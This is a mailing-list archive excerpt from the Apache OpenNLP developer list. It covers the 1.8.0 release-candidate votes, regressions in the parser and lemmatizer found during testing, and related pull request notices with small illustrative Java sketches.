Date:   2017-05-13T17:37:01Z

OPENNLP-1058: Update README.md to cover more

closes #198

commit 8ae5107f77453f13959525edee8694a6fefac2e6
Author: Jörn Kottmann <jo...@apache.org>
Date:   2017-05-15T19:54:40Z

OPENNLP-1060: Fix computation of hash for the parser






Re: [VOTE] Apache OpenNLP 1.8.0 Release Candidate 2

2017-05-15 Thread Joern Kottmann
Good to hear. The parser eval test also had a bug (OPENNLP-1060); we will fix
that as well before the next RC, which should prevent this from happening
again.

And thanks again for finding this!

Now we need to find the problem with the lemmatizer before we can build the
next RC.

Jörn



On Mon, May 15, 2017 at 6:21 PM, Richard Eckart de Castilho <r...@apache.org>
wrote:

> > On 15.05.2017, at 16:35, Joern Kottmann <kottm...@gmail.com> wrote:
> >
> > Richard, I believe I found the problem with the parser, would you mind
> > taking a look?
> >
> > This PR should fix it:
> > https://github.com/apache/opennlp/pull/199
>
> The parser test works nicely with the PR.
>
> The lemmatizer test still behaves strangely.
>
> Cheers,
>
> -- Richard
>
>


Re: [VOTE] Apache OpenNLP 1.8.0 Release Candidate 2

2017-05-15 Thread Joern Kottmann
Richard, I believe I found the problem with the parser, would you mind
taking a look?

This PR should fix it:
https://github.com/apache/opennlp/pull/199

Jörn

On Mon, May 15, 2017 at 4:14 PM, Richard Eckart de Castilho 
wrote:

> Hi Rodrigo,
>
> On 15.05.2017, at 15:36, Rodrigo Agerri  wrote:
> >
> > I cannot reproduce the lemmatizer issue. Could you please share your
> > training data?
>
> I have observed the change in behavior via the OpenNlpLemmatizerTrainerTest
> in DKPro Core [1]. It happens when I change the OpenNLP version in the POM
> from 1.7.2 to 1.8.0 (after including the OpenNLP staging Maven repo of
> course).
> Unfortunately, it's not a simple minimal OpenNLP-only unit test; it makes
> use of the respective DKPro Core UIMA components.
>
> The data that is used is the GUM 3.0.0 corpus, specifically the CoNLL
> files in it [2].
>
> The corpus can be downloaded from:
> https://github.com/amir-zeldes/gum/archive/V3.0.0.zip
>
> Cheers,
>
> -- Richard
>
> [1] https://github.com/dkpro/dkpro-core/blob/89f144a63b214cd584b3cd0e6c499dff6cbcd9ca/dkpro-core-opennlp-asl/src/test/java/de/tudarmstadt/ukp/dkpro/core/opennlp/OpenNlpLemmatizerTrainerTest.java
> [2] https://github.com/dkpro/dkpro-core/blob/master/dkpro-core-api-datasets-asl/src/main/resources/de/tudarmstadt/ukp/dkpro/core/api/datasets/lib/gum-en-conll-3.0.0.yaml


[GitHub] opennlp pull request #199: OPENNLP-1059 Set model version before creating th...

2017-05-15 Thread kottmann
GitHub user kottmann opened a pull request:

https://github.com/apache/opennlp/pull/199

OPENNLP-1059 Set model version before creating the POS Model

You can merge this pull request into a Git repository by running:

$ git pull https://github.com/kottmann/opennlp opennlp-1059

Alternatively you can review and apply these changes as the patch at:

https://github.com/apache/opennlp/pull/199.patch

To close this pull request, make a commit to your master/trunk branch
with (at least) the following in the commit message:

This closes #199


commit 108fa9a93c2cd126a138f8813390e197d0a3584e
Author: Jörn Kottmann <jo...@apache.org>
Date:   2017-05-15T14:04:58Z

OPENNLP-1059 Set model version before creating the POS Model






Re: [VOTE] Apache OpenNLP 1.8.0 Release Candidate 2

2017-05-15 Thread Joern Kottmann
Hello Richard,

thanks for reporting this. For 1.8.0 we replaced a Heap with a SortedSet
[1]. In this commit there is one loop [2] which iterates through the parses
which will be advanced. The order of the Parsers in the Heap was not so
well defined, therefore we decided to sort them by probability.
We also noticed that this change is changing the output of the parser with
the existing models in our SourceForge model eval test [3].
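
As a rough illustration of the ordering point above, here is a minimal
sketch, not the actual OpenNLP code. The Candidate class, the label
tie-breaker and the OrderingSketch name are hypothetical and exist only for
this example. It shows how a SortedSet with an explicit comparator gives a
well-defined iteration order, highest probability first:

```java
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Comparator;
import java.util.List;
import java.util.SortedSet;
import java.util.TreeSet;

// Hypothetical stand-in for a parse candidate; not the OpenNLP Parse class.
final class Candidate {
  final String label;
  final double prob;

  Candidate(String label, double prob) {
    this.label = label;
    this.prob = prob;
  }
}

final class OrderingSketch {

  // Highest probability first. The label tie-breaker is an assumption made
  // here so that candidates with equal probability are not collapsed by the
  // TreeSet and the order is fully deterministic.
  static final Comparator<Candidate> BY_PROB_DESC =
      Comparator.comparingDouble((Candidate c) -> c.prob)
          .reversed()
          .thenComparing(c -> c.label);

  // Returns the labels in the order a loop over the sorted set would see them.
  static List<String> sortedLabels(List<Candidate> candidates) {
    SortedSet<Candidate> set = new TreeSet<>(BY_PROB_DESC);
    set.addAll(candidates);
    List<String> labels = new ArrayList<>();
    for (Candidate c : set) {
      labels.add(c.label);
    }
    return labels;
  }

  public static void main(String[] args) {
    List<Candidate> in = Arrays.asList(
        new Candidate("b", 0.2), new Candidate("a", 0.7), new Candidate("c", 0.2));
    System.out.println(sortedLabels(in));
  }
}
```

If two candidates compare as equal, a TreeSet keeps only one of them, which
is why the sketch adds a tie-breaker. Whether the real change needs one is
not something this example can answer.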

After running the evaluation on the OntoNotes4 data set I only saw a very
small change and decided it is ok to do this. I do not know exactly how big
the change was, but it was less than the delta of 0.001 in test case [4].
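
For readers unfamiliar with delta-based checks, the idea is roughly the
following. This is a sketch only: DeltaCheckSketch and the numbers in main
are made up for illustration and are not the values from the eval test.

```java
final class DeltaCheckSketch {

  // True when actual lies within +/- delta of expected, which is the same
  // idea as JUnit's assertEquals(expected, actual, delta) for doubles.
  static boolean withinDelta(double expected, double actual, double delta) {
    return Math.abs(expected - actual) <= delta;
  }

  public static void main(String[] args) {
    // Hypothetical scores, chosen only to show both outcomes.
    System.out.println(withinDelta(0.9, 0.9005, 0.001));
    System.out.println(withinDelta(0.9, 0.902, 0.001));
  }
}
```

A test written this way keeps passing as long as the score moves by no more
than the delta, so a small change in parser output can go unnoticed by it.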

What do you think? Should this be rolled back?

That covers the parser. I still need to understand what happened with the
lemmatizer.

Jörn

[1]
https://github.com/apache/opennlp/commit/3df659b9bfb02084e782f1e8b6ec716f56e0611c
[2]
https://github.com/apache/opennlp/blob/3df659b9bfb02084e782f1e8b6ec716f56e0611c/opennlp-tools/src/main/java/opennlp/tools/parser/AbstractBottomUpParser.java#L285
[3]
https://github.com/apache/opennlp/commit/3df659b9bfb02084e782f1e8b6ec716f56e0611c#diff-a5834f32b8a41b76a336126e4b13d4f7L349
[4]
https://github.com/apache/opennlp/blob/3df659b9bfb02084e782f1e8b6ec716f56e0611c/opennlp-tools/src/test/java/opennlp/tools/eval/OntoNotes4ParserEval.java#L70

On Sat, May 13, 2017 at 10:35 PM, Richard Eckart de Castilho <r...@apache.org> wrote:

> Hi all,
>
> > On 11.05.2017, at 18:37, Joern Kottmann <kottm...@gmail.com> wrote:
> >
> > The Apache OpenNLP PMC would like to call for a Vote on Apache OpenNLP
> > 1.8.0 Release Candidate 2.
>
> Should OpenNLP 1.8.0 yield identical results as 1.7.2 when the same
> models are used during classification?
>
> E.g. the English parser model seems to create different POS tags now
> for the sentence "We need a very complicated example sentence ,
> which contains as many constituents and dependencies as possible .".
> "a" is now wrongly tagged as "," whereas 1.7.2 tagged it correctly as "DT".
>
> Should OpenNLP 1.8.0 yield identical results as 1.7.2 when the same
> training data is used during training?
>
> I have a test that trains a lemmatizer model on GUM 3.0.0. With 1.7.2,
> this model reached an f-score of ~0.96. With 1.8.0, I only get ~0.84.
>
> Cheers,
>
> -- Richard
>
>
>


Re: Error when processing doap file http://opennlp.apache.org/doap_opennlp.rdf:

2017-05-12 Thread Joern Kottmann
Thanks for forwarding this to the dev list. The file is now available again.

Jörn

On Fri, May 12, 2017 at 10:46 AM, sebb  wrote:

> -- Forwarded message --
> From: Projects 
> Date: 12 May 2017 at 03:00
> Subject: Error when processing doap file
> http://opennlp.apache.org/doap_opennlp.rdf:
> To: Site Development 
>
>
> http://opennlp.apache.org/doap_opennlp.rdf
>


[VOTE] Apache OpenNLP 1.8.0 Release Candidate 2

2017-05-11 Thread Joern Kottmann
The Apache OpenNLP PMC would like to call for a Vote on Apache OpenNLP
1.8.0 Release Candidate 2. 

The RC 2 distributables can be downloaded from here:
https://repository.apache.org/content/repositories/orgapacheopennlp-1012/org/apache/opennlp/opennlp-distr/1.8.0/

The release was made from the Apache OpenNLP 1.8.0 tag at
https://github.com/apache/opennlp/tree/opennlp-1.8.0
 
To use it in a maven build set the version for opennlp-tools or
opennlp-uima to 1.8.0 and add the following URL to your settings.xml
file:
https://repository.apache.org/content/repositories/orgapacheopennlp-1012
 
The release was made using the OpenNLP release process, documented on
the Wiki here:
https://cwiki.apache.org/confluence/display/OPENNLP/Release+Process
 
The release contains quite a few changes; please refer to the contained
issue list for details.
 
Please vote on releasing these packages as Apache OpenNLP 1.8.0. The
vote is open for at least the next 72 hours.
 
Only votes from OpenNLP PMC are binding, but folks are welcome to check
the release candidate and voice their approval or disapproval. The vote
passes if at least three binding +1 votes are cast.
 
[ ] +1 Release the packages as Apache OpenNLP 1.8.0
[ ] -1 Do not release the packages because...
 
 
Thanks!

Jörn

P.S. Here is my +1.


[ANNOUNCE] New website for Apache OpenNLP

2017-05-11 Thread Joern Kottmann
Hello all,

We have launched a redesigned website for Apache OpenNLP with a new logo.
Check it out at https://opennlp.apache.org

Regards,
The Apache OpenNLP Team


Re: [VOTE] Apache OpenNLP 1.8.0 Release Candidate

2017-05-11 Thread Joern Kottmann
I am canceling the vote due to the DictionaryLemmatizer bug quoted below.
Let's prepare another RC which has this issue fixed.

Jörn

On Thu, May 11, 2017 at 9:51 AM, Joern Kottmann <kottm...@gmail.com> wrote:

> I am changing my vote to -1 due to a bug in the DictionaryLemmatizer: if
> the word and postag pair is not in the dictionary, it throws a
> NullPointerException. See line 117 of DictionaryLemmatizer.
>
> Thanks to Daniel for finding this bug.
>
> Jörn
>
> On Wed, May 10, 2017 at 3:31 PM, Jeff Zemerick <jzemer...@apache.org>
> wrote:
>
>> +1 non-binding
>>
>> Built and tested on Ubuntu 16.04 and Amazon Linux 2017.03.0 with OpenJDK8.
>> NOTICE and LICENSE files look good.
>> Created and tested a token name finder model.
>>
>> Jeff
>>
>>
>> On Tue, May 9, 2017 at 2:41 PM, Joern Kottmann <kottm...@gmail.com>
>> wrote:
>>
>> > The Apache OpenNLP PMC would like to call for a Vote on Apache OpenNLP
>> > 1.8.0 Release Candidate 1.
>> >
>> > The RC 1 distributables can be downloaded from here:
>> > https://repository.apache.org/content/repositories/orgapacheopennlp-1011/org/apache/opennlp/opennlp-distr/1.8.0/
>> >
>> > The release was made from the Apache OpenNLP 1.8.0 tag at
>> > https://github.com/apache/opennlp/tree/opennlp-1.8.0
>> >
>> > To use it in a maven build set the version for opennlp-tools or
>> > opennlp-uima to 1.8.0 and add the following URL to your settings.xml
>> > file:
>> > https://repository.apache.org/content/repositories/orgapacheopennlp-1011
>> >
>> > The release was made using the OpenNLP release process, documented on
>> > the Wiki here:
>> > https://cwiki.apache.org/confluence/display/OPENNLP/Release+Process
>> >
>> > The release contains quite some changes, please refer to the contained
>> > issue list for details.
>> >
>> > Please vote on releasing these packages as Apache OpenNLP 1.8.0. The
>> > vote is open for at least the next 72 hours.
>> >
>> > Only votes from OpenNLP PMC are binding, but folks are welcome to check
>> > the release candidate and voice their approval or disapproval. The vote
>> > passes if at least three binding +1 votes are cast.
>> >
>> > [ ] +1 Release the packages as Apache OpenNLP 
>> > [ ] -1 Do not release the packages because...
>> >
>> >
>> > Thanks!
>> >
>> > Jörn
>> >
>> > P.S. Here is my +1.
>> >
>>
>
>


Re: [VOTE] Apache OpenNLP 1.8.0 Release Candidate

2017-05-11 Thread Joern Kottmann
I am changing my vote to -1 due to a bug in the DictionaryLemmatizer: if
the word and postag pair is not in the dictionary, it throws a
NullPointerException. See line 117 of DictionaryLemmatizer.
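
To make the failure mode concrete, here is a minimal sketch of the pattern.
It is not the DictionaryLemmatizer source; LemmaLookupSketch, its methods and
the fallback parameter are hypothetical names used only for this example.

```java
import java.util.Arrays;
import java.util.HashMap;
import java.util.List;
import java.util.Map;

final class LemmaLookupSketch {

  // Key is the (word, postag) pair; lists compare by content, so they work
  // as map keys.
  private final Map<List<String>, String> dict = new HashMap<>();

  void put(String word, String posTag, String lemma) {
    dict.put(Arrays.asList(word, posTag), lemma);
  }

  // Unsafe variant: Map.get returns null for a missing pair, so calling a
  // method on the result throws a NullPointerException.
  String lemmaUnsafe(String word, String posTag) {
    return dict.get(Arrays.asList(word, posTag)).trim();
  }

  // Guarded variant: returns a caller-supplied fallback (an assumption of
  // this sketch) when the pair is not in the dictionary.
  String lemmaSafe(String word, String posTag, String fallback) {
    String lemma = dict.get(Arrays.asList(word, posTag));
    return lemma == null ? fallback : lemma.trim();
  }

  public static void main(String[] args) {
    LemmaLookupSketch sketch = new LemmaLookupSketch();
    sketch.put("houses", "NNS", "house");
    System.out.println(sketch.lemmaSafe("houses", "NNS", "?"));
    System.out.println(sketch.lemmaSafe("unknown", "NN", "?"));
  }
}
```

What the real class should return for an unknown pair is a design decision
for the fix; the sketch only shows that the lookup result needs a null check.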

Thanks to Daniel for finding this bug.

Jörn

On Wed, May 10, 2017 at 3:31 PM, Jeff Zemerick <jzemer...@apache.org> wrote:

> +1 non-binding
>
> Built and tested on Ubuntu 16.04 and Amazon Linux 2017.03.0 with OpenJDK8.
> NOTICE and LICENSE files look good.
> Created and tested a token name finder model.
>
> Jeff
>
>
> On Tue, May 9, 2017 at 2:41 PM, Joern Kottmann <kottm...@gmail.com> wrote:
>
> > The Apache OpenNLP PMC would like to call for a Vote on Apache OpenNLP
> > 1.8.0 Release Candidate 1.
> >
> > The RC 1 distributables can be downloaded from here:
> > https://repository.apache.org/content/repositories/orgapacheopennlp-1011/org/apache/opennlp/opennlp-distr/1.8.0/
> >
> > The release was made from the Apache OpenNLP 1.8.0 tag at
> > https://github.com/apache/opennlp/tree/opennlp-1.8.0
> >
> > To use it in a maven build set the version for opennlp-tools or
> > opennlp-uima to 1.8.0 and add the following URL to your settings.xml
> > file:
> > https://repository.apache.org/content/repositories/orgapacheopennlp-1011
> >
> > The release was made using the OpenNLP release process, documented on
> > the Wiki here:
> > https://cwiki.apache.org/confluence/display/OPENNLP/Release+Process
> >
> > The release contains quite some changes, please refer to the contained
> > issue list for details.
> >
> > Please vote on releasing these packages as Apache OpenNLP 1.8.0. The
> > vote is open for at least the next 72 hours.
> >
> > Only votes from OpenNLP PMC are binding, but folks are welcome to check
> > the release candidate and voice their approval or disapproval. The vote
> > passes if at least three binding +1 votes are cast.
> >
> > [ ] +1 Release the packages as Apache OpenNLP 
> > [ ] -1 Do not release the packages because...
> >
> >
> > Thanks!
> >
> > Jörn
> >
> > P.S. Here is my +1.
> >
>


[GitHub] opennlp pull request #196: [1.8.1] OPENNLP-1054: Remove deprecated Heap and ...

2017-05-10 Thread kottmann
GitHub user kottmann opened a pull request:

https://github.com/apache/opennlp/pull/196

[1.8.1] OPENNLP-1054: Remove deprecated Heap and HeapList

You can merge this pull request into a Git repository by running:

$ git pull https://github.com/kottmann/opennlp opennlp-1054

Alternatively you can review and apply these changes as the patch at:

https://github.com/apache/opennlp/pull/196.patch

To close this pull request, make a commit to your master/trunk branch
with (at least) the following in the commit message:

This closes #196


commit 77b9da37dbda82123a9f368a865ec44e0b4ded2c
Author: Jörn Kottmann <jo...@apache.org>
Date:   2017-05-10T14:48:09Z

OPENNLP-1054: Remove deprecated Heap and HeapList






[VOTE] Apache OpenNLP 1.8.0 Release Candidate

2017-05-09 Thread Joern Kottmann
The Apache OpenNLP PMC would like to call for a Vote on Apache OpenNLP
1.8.0 Release Candidate 1. 

The RC 1 distributables can be downloaded from here:
https://repository.apache.org/content/repositories/orgapacheopennlp-1011/org/apache/opennlp/opennlp-distr/1.8.0/

The release was made from the Apache OpenNLP 1.8.0 tag at
https://github.com/apache/opennlp/tree/opennlp-1.8.0
 
To use it in a maven build set the version for opennlp-tools or
opennlp-uima to 1.8.0 and add the following URL to your settings.xml
file:
https://repository.apache.org/content/repositories/orgapacheopennlp-1011
 
The release was made using the OpenNLP release process, documented on
the Wiki here:
https://cwiki.apache.org/confluence/display/OPENNLP/Release+Process
 
The release contains quite a few changes; please refer to the contained
issue list for details.
 
Please vote on releasing these packages as Apache OpenNLP 1.8.0. The
vote is open for at least the next 72 hours.
 
Only votes from OpenNLP PMC are binding, but folks are welcome to check
the release candidate and voice their approval or disapproval. The vote
passes if at least three binding +1 votes are cast.
 
[ ] +1 Release the packages as Apache OpenNLP 
[ ] -1 Do not release the packages because...
 
 
Thanks!

Jörn

P.S. Here is my +1.


[GitHub] opennlp pull request #185: OPENNLP-1046: Correctly join tokens to text strin...

2017-04-26 Thread kottmann
Github user kottmann closed the pull request at:

https://github.com/apache/opennlp/pull/185




[GitHub] opennlp pull request #185: OPENNLP-1046: Correctly join tokens to text strin...

2017-04-26 Thread kottmann
GitHub user kottmann opened a pull request:

https://github.com/apache/opennlp/pull/185

OPENNLP-1046: Correctly join tokens to text string

The text was one space too long which results in a different
parse tree if the method is used to reproduce an existing
parse tree as it is done by the parser evaluation tool.
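
A minimal sketch of this kind of off-by-one-space join follows. It assumes
the extra space was a trailing one, which the description above does not
state, and TokenJoinSketch is a hypothetical name, not the patched method.

```java
import java.util.Arrays;
import java.util.List;

final class TokenJoinSketch {

  // Appends a space after every token, so the result ends with one space
  // more than the tokens need.
  static String joinWithTrailingSpace(List<String> tokens) {
    StringBuilder sb = new StringBuilder();
    for (String token : tokens) {
      sb.append(token).append(' ');
    }
    return sb.toString();
  }

  // Puts a single space between tokens only.
  static String join(List<String> tokens) {
    return String.join(" ", tokens);
  }

  public static void main(String[] args) {
    List<String> tokens = Arrays.asList("We", "need", "a", "sentence", ".");
    System.out.println("[" + joinWithTrailingSpace(tokens) + "]");
    System.out.println("[" + join(tokens) + "]");
  }
}
```

The two results differ by exactly one character, which is enough to shift
character offsets when the text is used to rebuild an existing parse tree.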

You can merge this pull request into a Git repository by running:

$ git pull https://github.com/kottmann/opennlp opennlp-1046

Alternatively you can review and apply these changes as the patch at:

https://github.com/apache/opennlp/pull/185.patch

To close this pull request, make a commit to your master/trunk branch
with (at least) the following in the commit message:

This closes #185


commit f4f1368eeb0d59bc2566d7a353730aaa81c7a961
Author: Jörn Kottmann <jo...@apache.org>
Date:   2017-04-26T08:46:48Z

OPENNLP-1046: Correctly join tokens to text string

The text was one space too long which results in a different
parse tree if the method is used to reproduce an existing
parse tree as it is done by the parser evaluation tool.






[GitHub] opennlp pull request #184: [WIP] OPENNLP-1021: Change xv folds from 10 to 5 ...

2017-04-24 Thread kottmann
GitHub user kottmann opened a pull request:

https://github.com/apache/opennlp/pull/184

[WIP] OPENNLP-1021: Change xv folds from 10 to 5 to reduce runtime

You can merge this pull request into a Git repository by running:

$ git pull https://github.com/kottmann/opennlp opennlp-1021

Alternatively you can review and apply these changes as the patch at:

https://github.com/apache/opennlp/pull/184.patch

To close this pull request, make a commit to your master/trunk branch
with (at least) the following in the commit message:

This closes #184


commit 79ca96b767644b7e65a62fe042bb844b9c14c5aa
Author: Jörn Kottmann <jo...@apache.org>
Date:   2017-04-24T14:08:13Z

OPENNLP-1021: Change xv folds from 10 to 5 to reduce runtime





